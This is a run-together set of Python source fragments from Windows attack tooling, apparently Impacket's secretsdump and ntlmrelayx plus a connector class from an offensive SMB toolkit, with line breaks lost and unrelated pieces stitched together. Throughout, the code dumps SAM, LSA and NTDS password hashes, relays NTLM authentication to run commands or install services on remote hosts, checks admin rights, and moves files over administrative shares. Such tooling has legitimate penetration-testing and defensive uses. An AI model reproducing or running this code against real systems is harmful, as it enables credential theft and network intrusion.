self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost) self.__remoteOps.setExecMethod(self.__options.exec_method) if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True: self.__remoteOps.enableRegistry() bootKey = self.__remoteOps.getBootKey() # Let's check whether target system stores LM Hashes self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy() except Exception as e: self.__canProcessSAMLSA = False if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \ and self.__doKerberos is True: # Giving some hints here when SPN target name validation is set to something different to Off # This will prevent establishing SMB connections using TGS for SPNs different to cifs/ logging.error('Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user') else: logging.error('RemoteOperations failed: %s' % str(e)) # If RemoteOperations succeeded, then we can extract SAM and LSA if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA: try: if self.__isRemote is True: SAMFileName = self.__remoteOps.saveSAM() else: SAMFileName = self.__samHive self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote) self.__SAMHashes.dump() if self.__outputFileName is not None: self.__SAMHashes.export(self.__outputFileName) except Exception as e: logging.error('SAM hashes extraction failed: %s' % str(e)) try: if self.__isRemote is True: SECURITYFileName = self.__remoteOps.saveSECURITY() else: SECURITYFileName = self.__securityHive self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps, isRemote=self.__isRemote, history=self.__history) self.__LSASecrets.dumpCachedHashes() if self.__outputFileName is not None: self.__LSASecrets.exportCached(self.__outputFileName) self.__LSASecrets.dumpSecrets() if self.__outputFileName is not None: self.__LSASecrets.exportSecrets(self.__outputFileName) except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error('LSA hashes extraction failed: %s' % str(e)) # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work if self.__isRemote is True: if self.__useVSSMethod and self.__remoteOps is not None: NTDSFileName = self.__remoteOps.saveNTDS() else: NTDSFileName = None else: NTDSFileName = self.__ntdsFile self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history, noLMHash=self.__noLMHash, remoteOps=self.__remoteOps, useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM, pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName, outputFileName=self.__outputFileName, justUser=self.__justUser, printUserStatus= self.__printUserStatus) try: self.__NTDSHashes.dump() except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0: # We don't store the resume file if this error happened, since this error is related to lack # of enough privileges to access DRSUAPI. resumeFile = self.__NTDSHashes.getResumeSessionFile() if resumeFile is not None: os.unlink(resumeFile) logging.error(e) if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0: logging.info("You just got that error because there might be some duplicates of the same name. " "Try specifying the domain name for the user as well. It is important to specify it " "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).") elif self.__useVSSMethod is False: logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter') self.cleanup() except (Exception, KeyboardInterrupt) as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) if self.__NTDSHashes is not None: if isinstance(e, KeyboardInterrupt): while True: answer = input("Delete resume session file? [y/N] ") if answer.upper() == '': answer = 'N' break elif answer.upper() == 'Y': answer = 'Y' break elif answer.upper() == 'N': answer = 'N' break if answer == 'Y': resumeFile = self.__NTDSHashes.getResumeSessionFile() if resumeFile is not None: os.unlink(resumeFile) try: self.cleanup() except: pass def cleanup(self): try: logging.info('Cleaning up... ') if self.__remoteOps: self.__remoteOps.finish() if self.__SAMHashes: self.__SAMHashes.finish() if self.__LSASecrets: self.__LSASecrets.finish() if self.__NTDSHashes: self.__NTDSHashes.finish() except Exception as e: if str(e).find('ERROR_DEPENDENT_SERVICES_RUNNING') < 0: raise
def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None: LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port) #Start listening and launch interactive shell self.tcpshell.listen() self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile) self.shell.cmdloop() return if self.config.exeFile is not None: result = self.installService.install() if result is True: LOG.info("Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER if self.__SMBConnection.getDialect() == smb.SMB_DIALECT: flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception as e: if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges if self.config.enumLocalAdmins: LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding))) enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection) try: localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins() LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding))) for name in localAdminNames: LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name)) except DCERPCException: LOG.info("SAMR access denied") return # Something else went wrong. aborting LOG.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote(self.config.command) LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = '' self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer) self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output') print(self.__answerTMP.decode(self.config.encoding, 'replace')) else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes') LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception as e: LOG.error(str(e)) finally: if samHashes is not None: samHashes.finish() if remoteOps is not None: remoteOps.finish()
class SmbCon(Connector): def __init__(self, args, loggers, host, db): Connector.__init__(self, args, loggers, host) self.auth = False self.con = False self.client = ''.join( [choice(ascii_letters + digits) for x in range(7)]) self.smbv1 = False self.os = '' self.admin = False self.signing = False self.os_arch = '0' self.remote_ops = None self.bootkey = None self.db = db self.port = 445 ######################### # Session Management ######################### def create_smb_con(self): # Create SMB Con if self.smb_connection(): self.host_info() try: # SMB Auth self.con.login(self.username, self.password, self.domain, lmhash=self.lmhash, nthash=self.nthash) self.auth = True self.host_info() self.isAdmin() self.update_db() except Exception as e: raise Exception(str(e)) else: raise Exception('Connection to Server Failed') def update_db(self): self.db.update_host(self.host, self.ip, self.domain, self.os, self.signing) if self.username and self.password or self.username and self.hash: self.db.update_user(self.username, self.password, self.domain, self.hash) if self.admin: self.db.update_admin(self.username, self.domain, self.host) def logoff(self): self.con.logoff() def close(self): try: self.con.logoff() except: pass try: self.con.close() except: pass ######################### # SMB Connection ######################### def smb_connection(self): if self.smbv1_con(): return True elif self.smbv3_con(): return True return False def smbv1_con(self): try: self.con = SMBConnection(self.client, self.host, sess_port=self.port, preferredDialect=SMB_DIALECT, timeout=int(self.timeout)) self.smbv1 = True self.con.setTimeout(self.timeout) return True except Exception as e: return False def smbv3_con(self): try: self.con = SMBConnection(self.client, self.host, sess_port=self.port, timeout=int(self.timeout)) self.con.setTimeout(self.timeout) return True except Exception as e: return False ######################### # Authentication (NOT IN USE) ######################### def set_host(self, local_auth): # Get domain for authentication purposes if local_auth: self.domain = self.con.getServerName( ) + "." + self.con.getServerDNSDomainName() else: self.domain = self.con.getServerDNSDomainName() # Backup for Linux/Unix systems if not self.domain: self.domain = self.con.getServerName( ) + "." + self.con.getServerDNSDomainName() ################################ # Enumerate Host information ################################ def host_info(self): try: self.srvdomain = self.get_domain() self.host = self.get_hostname() self.os = self.con.getServerOS() self.signing = self.con.isSigningRequired() arch = self.get_os_arch() if arch == 32 or arch == 64: self.os_arch = " x{}".format(str(arch)) else: self.os_arch = '' except Exception as e: self.logger.debug("SMB Host Info: {}".format(str(e))) def get_os_arch(self): # Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py # Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py try: stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host) transport = DCERPCTransportFactory(stringBinding) transport.set_connect_timeout(5) dce = transport.get_dce_rpc() dce.connect() try: dce.bind( MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')) except DCERPCException as e: if str(e).find('syntaxes_not_supported') >= 0: dce.disconnect() return 32 else: dce.disconnect() return 64 except: return 0 def get_hostname(self): if self.con.getServerDNSDomainName() and not self.local_auth: if self.con.getServerName().lower( ) != self.con.getServerDNSDomainName().lower(): return (self.con.getServerName() + "." + self.con.getServerDNSDomainName()) else: return self.con.getServerName() else: return self.con.getServerName() def get_domain(self): try: return self.con.getServerDomain() except: return self.getServerName() def list_shares(self): # name=share['shi1_netname'][:-1], description=share['shi1_remark'] return self.con.listShares() ################################ # Host/Domain Password Policy ################################ def password_policy(self): SAMRDump(self).dump(self.host) ################################ # List Shares & Check Share Permissions ################################ def read_perm(self, share): try: # Silently list path to check access self.list_path(share, False) return True except: return False def write_perm(self, share): try: # Create dir to check write access tmp = '.' + ''.join( [choice(ascii_letters + digits) for x in range(5)]) self.con.createDirectory(share, tmp) self.con.deleteDirectory(share, tmp) return True except Exception as e: return False def list_path(self, share, path): if not path: path = '/*' return self.con.listPath(share, path) ################################ # Check if User Admin ################################ def isAdmin(self): rpctransport = SMBTransport(self.host, self.port, r'\svcctl', smb_connection=self.con) dce = rpctransport.get_dce_rpc() try: dce.connect() except: pass else: dce.bind(scmr.MSRPC_UUID_SCMR) try: # 0xF003F - SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host), 'ServicesActive\x00', 0xF003F) self.admin = True return True except scmr.DCERPCException as e: pass return False ################################ # Dump SAM / LSA ################################ def enable_remoteops(self): # Source: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py if self.remote_ops is not None and self.bootkey is not None: return try: self.remote_ops = RemoteOperations(self.con, False, None) self.remote_ops.enableRegistry() self.bootkey = self.remote_ops.getBootKey() except Exception as e: self.logger.fail('RemoteOperations failed for {}: {}'.format( self.host, str(e))) def sam(self): try: self.enable_remoteops() def add_sam_hash(sam_hash, host_id): self.logger.success( [self.host, highlight("SAM HASH"), sam_hash]) username, _, lmhash, nthash, _, _, _ = sam_hash.split(':') self.db.update_user(username, '', host_id, "{}:{}".format(lmhash, nthash)) if self.remote_ops and self.bootkey: SAMFileName = self.remote_ops.saveSAM() SAM = SAMHashes(SAMFileName, self.bootkey, isRemote=True, perSecretCallback=lambda secret: add_sam_hash( secret, self.host)) SAM.dump() except Exception as e: self.logger.fail('SAM Extraction Failed for {}: {}'.format( self.host, str(e))) try: self.remote_ops.finish() except Exception as e: self.logger.debug( "Error calling remote_ops.finish() for {}: {}".format( self.host, str(e))) SAM.finish() ################################ # File Interaction ################################ def createFile(self, filename, data, share='C$'): # Create new file & write data, Not In Use f = remotefile.RemoteFile(self.con, filename, share) f.create() f.write(data) f.close() def uploadFile(self, local_file, location, share='C$'): f = open(local_file) self.con.putFile(share, location, f.read) f.close() def downloadFile(self, remote_file, location='ar3_download', share='C$'): f = open(location, 'wb') self.con.getFile(share, remote_file, f.write) f.close() return def deleteFile(self, remote_file, share='C$'): self.con.deleteFile(share, remote_file)